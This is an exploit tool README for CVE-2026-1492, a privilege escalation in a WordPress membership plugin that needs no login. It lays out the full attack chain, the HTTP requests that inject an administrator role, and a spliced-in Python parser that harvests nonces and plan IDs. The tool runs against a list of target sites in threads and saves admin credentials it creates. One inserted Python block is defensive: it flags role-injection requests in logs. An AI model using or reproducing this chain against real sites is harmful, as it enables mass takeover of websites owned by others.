## https://sploitus.com/exploit?id=CC22F87B-5CD4-5B03-BD22-6BB26E97C46B
# CVE-2026-1492
User Registration & Membership <= 5.1.2 - Unauthenticated Privilege Escalation via Membership Registration
---
## Vulnerability Overview
### CVE-2026-1492: Unauthenticated Privilege Escalation via Membership Registration
| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-1492 |
| **Severity** | **CRITICAL** (CVSS v3.1 Score: **9.8**) |
| **Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Affected Software** | User Registration & Membership (Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin for WordPress) |
| **Affected Versions** | All versions up to and including **5.1.2** |
| **Vulnerability Type** | Improper Privilege Management: Unauthenticated Administrator Account Creation |
| **Authentication Required** | **None** |
| **CWE** | CWE-269: Improper Privilege Management |
**Description:**
The **User Registration & Membership** plugin for WordPress is vulnerable to **Unauthenticated Privilege Escalation** in all versions up to and including **5.1.2**. The `user_registration_membership_register_member` AJAX handler accepts a **user-supplied `role` value** during membership registration without enforcing a server-side allowlist or a capability check. An unauthenticated remote attacker can chain two AJAX requests: first register a new user account, then submit a `register_member` call with `"role": "administrator"` injected into the `members_data` JSON payload, silently turning the new account into a fully privileged WordPress **Administrator**. The result is complete compromise of the affected WordPress installation with no user interaction required.
---
## Tool Description
This is a **Proof-of-Concept (PoC)** exploitation script implementing a **full state-aware attack chain** against WordPress sites running a vulnerable version of the **User Registration & Membership** plugin. The tool performs multi-stage exploitation with automatic discovery, plan extraction, nonce harvesting, dual-flow registration, role injection, and admin verification.
### Full Attack Chain
```
[Discovery Phase]
GET /membership-pricing/          → Extract membership plan IDs
GET /registration/                → Extract form fields, nonces, AJAX params
        ↓
[Registration Phase - Flow A]
POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  → Register new user account
        ↓
[Role Injection Phase - Flow A]
POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator", "membership":"", ...}
  → Inject administrator role into newly created account
        ↓
[Admin Verification Phase]
GET /wp-admin/                    → Check for admin dashboard indicators
GET /wp-admin/plugin-install.php  → Confirm plugin-install access
        ↓
[Fallback Override - Flow B]
If Flow A admin check fails → repeat with fresh username/email
        ↓
[Write to Nx_admin.txt]
Format: https://target.com/wp-login.php user:<username>|pass:<password>
```
---
## Requirements
### System Requirements
- Python **3.8** or higher
- Linux / Windows / macOS
### Python Dependencies
```bash
pip install requests urllib3 rich
```
Or via requirements file:
```bash
pip install -r requirements.txt
```
**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0
```
---
## Installation
```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1492.git
cd CVE-2026-1492
# Install dependencies
pip install -r requirements.txt
# Run the tool
python3 CVE-2026-1492.py
```
---
## Usage
### Basic Run
```bash
python3 CVE-2026-1492.py
```
The tool uses a fully interactive terminal interface powered by **Rich**. All parameters are prompted at runtime.
---
### Target List Format
Create a plain text file (default: `list.txt`) with one target per line:
```
https://target1.com
https://target2.com
http://target3.com/wordpress
```
---
### Interactive Prompts
```
Targets file [list.txt]: list.txt
Credentials:
- Username prefix: random number is added per site (fresh user per target/plan/flow)
- Email: if left empty, it will be built from the username automatically
- Password: fixed for all sites
Username prefix (optional): Nxploited
Email (optional):
Password [Nx_12999]: Nx_12999
Threads [3]: 5
HTTP timeout (seconds) [10]: 10
```
---
## Exploitation Deep Dive
### Step 1: Discovery
The tool automatically discovers and parses:
| Target | What is Extracted |
|---|---|
| `/membership-pricing/` | Membership plan IDs, registration page links |
| `/registration/` | Form fields, nonces, AJAX URLs, membership radio inputs |
| `user_registration_params` JS object | `ajax_url`, `security` nonce, form metadata |
| `ur_membership_frontend_localized_data` | Membership-specific nonce, AJAX endpoint |
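The discovery step above is, in practice, a matter of pulling a few JSON objects and form attributes out of one HTML response. The following Python is an added example written for this page, not code from the Nxploited tool: it parses a constructed registration page that mimics the markup the README describes (a `user_registration_params` object, a `ur_membership_frontend_localized_data` object, a hidden `ur_frontend_form_nonce` input and membership radio inputs) and maps the result onto the tool's `NO-UR-NONCE` / `NO-MEM-ID` status codes. The attribute names, the `_nonce` key, the nonce values and the plan IDs are assumptions.

```python
"""Discovery-phase parser for a registration page (added example, not the PoC's code)."""
import json
import re

# Constructed registration page resembling the README's description.
# All nonces, IDs and hostnames are fake.
SAMPLE_HTML = """
<script>
var user_registration_params = {"ajax_url":"https:\\/\\/target.example\\/wp-admin\\/admin-ajax.php","security":"7c1a9b2f4e","form_id":"1"};
var ur_membership_frontend_localized_data = {"_nonce":"d3adb33f01","ajax_url":"https:\\/\\/target.example\\/wp-admin\\/admin-ajax.php"};
</script>
<form id="user-registration-form-1" data-form-id="1">
  <input type="hidden" name="ur_frontend_form_nonce" value="a1b2c3d4e5" />
  <input type="radio" name="membership" class="ur-membership-input" value="3" /> Free
  <input type="radio" name="membership" class="ur-membership-input" value="5" /> Pro
</form>
"""

# `var name = {...};` assignments whose right-hand side is a flat JSON literal.
JS_OBJECT_RE = re.compile(r"var\s+(\w+)\s*=\s*(\{.*?\});", re.S)
# Membership plan radio inputs; the name-before-value attribute order is assumed.
PLAN_RE = re.compile(r'<input[^>]*name="membership"[^>]*value="(\d+)"', re.I)
FORM_NONCE_RE = re.compile(r'name="ur_frontend_form_nonce"[^>]*value="([^"]+)"')


def extract_js_objects(html: str) -> dict:
    """Map each localized-data variable name to its decoded JSON object."""
    found = {}
    for name, body in JS_OBJECT_RE.findall(html):
        try:
            found[name] = json.loads(body)
        except json.JSONDecodeError:
            continue  # not a pure JSON literal (e.g. contains JS code); skip it
    return found


def discover(html: str) -> dict:
    """Collect everything the two AJAX calls need from one registration page."""
    objs = extract_js_objects(html)
    ur = objs.get("user_registration_params", {})
    mem = objs.get("ur_membership_frontend_localized_data", {})
    nonce = FORM_NONCE_RE.search(html)
    return {
        "ajax_url": ur.get("ajax_url"),
        "security": ur.get("security"),
        "form_id": ur.get("form_id"),
        "form_nonce": nonce.group(1) if nonce else None,
        "membership_nonce": mem.get("_nonce"),  # key name is an assumption
        "plan_ids": [int(v) for v in PLAN_RE.findall(html)],
    }


def classify(info: dict):
    """Map a discovery result to the README's status codes; None means usable."""
    if not info["security"] or not info["form_nonce"]:
        return "NO-UR-NONCE"
    if not info["plan_ids"]:
        return "NO-MEM-ID"
    return None


if __name__ == "__main__":
    result = discover(SAMPLE_HTML)
    print(json.dumps(result, indent=2))
    print("status:", classify(result))
```

A regex-based scrape like this is deliberately tolerant of theme markup around the form, but it only recognises `var name = {...};` assignments whose value is pure JSON; sites that inline functions into the localized object will need a real JS tokenizer.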
### Step 2: Registration AJAX
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}]
&form_id=1
&ur_frontend_form_nonce=
&security=
&is_membership_active=
```
### Step 3: Role Injection AJAX (The Vulnerable Call)
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&members_data={"membership":"","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...}
&form_response={...}
&_wpnonce=
&security=
```
> The server accepts the `role` field from the client without any allowlist validation; this is the root cause of CVE-2026-1492.
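The vulnerable call described in the Vulnerability Overview and in Step 3 comes down to one untrusted field, `members_data.role`. The following Python is an added example written for this page (not the Nxploited PoC's code and not the plugin's): it applies the check the handler should have enforced, an allowlist on `role`, to recorded `admin-ajax.php` POST bodies, so a defender can flag exploitation attempts in proxy or WAF logs. The allowlist (`subscriber` only), the sample request bodies, the source addresses and the nonce values are constructed assumptions.

```python
"""Detect role injection in register_member calls (added example, not the PoC's code)."""
import json
from urllib.parse import parse_qs, urlencode

VULN_ACTION = "user_registration_membership_register_member"
# Roles a self-service membership registration may legitimately assign.
# Assumed policy; a real deployment should mirror its own plugin configuration.
ALLOWED_ROLES = {"subscriber"}


def inspect_admin_ajax_body(body: str):
    """Return a finding for a register_member call whose role is outside the
    allowlist (or whose members_data is malformed); None for anything else.
    `body` is the raw application/x-www-form-urlencoded request body."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("action") != VULN_ACTION:
        return None
    try:
        members = json.loads(params.get("members_data", ""))
    except json.JSONDecodeError:
        return {"action": VULN_ACTION, "reason": "members_data is not valid JSON"}
    if not isinstance(members, dict):
        return {"action": VULN_ACTION, "reason": "members_data is not a JSON object"}
    role = members.get("role")
    if role is None:
        return None  # no client-supplied role; nothing to flag here
    if isinstance(role, str) and role in ALLOWED_ROLES:
        return None
    return {
        "action": VULN_ACTION,
        "username": members.get("username"),
        "role": role,
        "reason": "client-supplied role outside allowlist",
    }


# Constructed (src_ip, body) records mimicking a reverse-proxy log.  Nonces are fake.
SAMPLE_REQUESTS = [
    # Flow A, step 1: ordinary registration call; not the vulnerable action.
    ("203.0.113.7", urlencode({
        "action": "user_registration_user_form_submit",
        "form_data": json.dumps([{"field_name": "user_login",
                                  "value": "Nxploited_A_482910"}]),
        "form_id": "1",
    })),
    # Flow A, step 2: the role-injection call described in the README.
    ("203.0.113.7", urlencode({
        "action": VULN_ACTION,
        "members_data": json.dumps({"membership": "", "payment_method": "free",
                                    "role": "administrator",
                                    "username": "Nxploited_A_482910"}),
        "_wpnonce": "deadbeef01", "security": "cafebabe02",
    })),
    # Legitimate member sign-up with an allowlisted role.
    ("198.51.100.4", urlencode({
        "action": VULN_ACTION,
        "members_data": json.dumps({"membership": "3", "payment_method": "free",
                                    "role": "subscriber", "username": "alice"}),
        "_wpnonce": "0123456789", "security": "9876543210",
    })),
]


def scan(records):
    """Run the check over (src_ip, body) pairs and return the findings."""
    findings = []
    for src, body in records:
        finding = inspect_admin_ajax_body(body)
        if finding:
            finding["src"] = src
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"[ALERT] {f['src']} {f['reason']}: "
              f"user={f.get('username')} role={f.get('role')}")
```

Because the request is unauthenticated, the `_wpnonce` and `security` values say nothing about who sent it; the decision has to rest on the decoded `role`. The same allowlist, enforced server-side before any role is assigned and paired with the capability check the overview notes is missing, is what closes the hole.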
### Step 4: Admin Verification
The tool opens a fresh session, logs in with the newly created credentials, and probes:
| Endpoint | Indicator Checked |
|---|---|
| `/wp-admin/` | `adminmenu`, `wp-admin-bar`, `manage_options` |
| `/wp-admin/users.php` | `users.php` |
| `/wp-admin/plugin-install.php` | `upload-plugin`, `plugin-install-tab` |
---
## Output Files
| File | Description |
|---|---|
| `Nx_admin.txt` | Confirmed administrator accounts |
| `membership_success_log.txt` | All successful membership role-injection calls |
| `discovery_log.txt` | Full discovery data per target (nonces, IDs, fields) |
| `registration_log.txt` | All registration AJAX requests and responses |
| `membership_log.txt` | All membership AJAX requests and responses |
| `admin_check_log.txt` | Login attempts and admin verification results |
### Admin Output Format
```
https://target.com/wp-login.php user:Nxploited_A_482910|pass:Nx_12999
```
---
## Terminal Output Sample
```
┌────────────────────────────────────────────────────────────┐
│ CVE-2026-1492 | User Registration & Membership - Admin PoC │
│ By: Nxploited | GitHub: github.com/Nxploited | @KNxploited │
└────────────────────────────────────────────────────────────┘
[INFO] https://target.com
[OK] https://target.com | REG-A-OK user:Nxploited_A_482910 mem:3
[OK] https://target.com | MEM-A-OK membership A (role=administrator payload) sent
[OK] https://target.com | ADMIN-A user:Nxploited_A_482910 pass:Nx_12999 mem:3
┌─────────────────────┬────────────┬─────────────────────────────┐
│ Target              │ Status     │ Note                        │
├─────────────────────┼────────────┼─────────────────────────────┤
│ https://target.com  │ ADMIN-A    │ user:Nxploited_A_482910 ... │
│ https://target2.com │ MEM-B-FAIL │ membership not configured   │
│ https://target3.com │ DEAD       │ connection error            │
└─────────────────────┴────────────┴─────────────────────────────┘
```
---
## Status Codes Reference
| Status | Color | Meaning |
|---|---|---|
| `ADMIN-A` / `ADMIN-B` | Green | Administrator confirmed (Flow A or B) |
| `ADMIN-A-OVERRIDE` | Green | Admin confirmed after override attempt |
| `REG-A-FAIL` / `REG-B-FAIL` | Yellow | Registration AJAX returned failure |
| `MEM-A-FAIL` / `MEM-B-FAIL` | Magenta | Membership role-injection call failed |
| `REG-PENDING-A/B` | Dark | Account requires email verification or admin approval |
| `NO-MEM-ID` | Dark | Membership plan ID not found on target |
| `NO-UR-NONCE` | Dark | Registration nonce not extractable |
| `NO-ADMIN` | Dark | Membership OK but admin access not confirmed |
| `TIMEOUT` | Dark | HTTP timeout |
| `DEAD` | Dark | Connection error (site unreachable) |
| `ERROR` | Red | Unexpected exception |
---
## Contact & Author
By: Nxploited (Khaled Alenazi)
---
## Legal Disclaimer
> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - **Permitted:** Use on systems you own or have been granted **explicit written permission** to test.
> - **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole and full responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.
---
© 2026 Nxploited (Khaled Alenazi). For authorized security research only.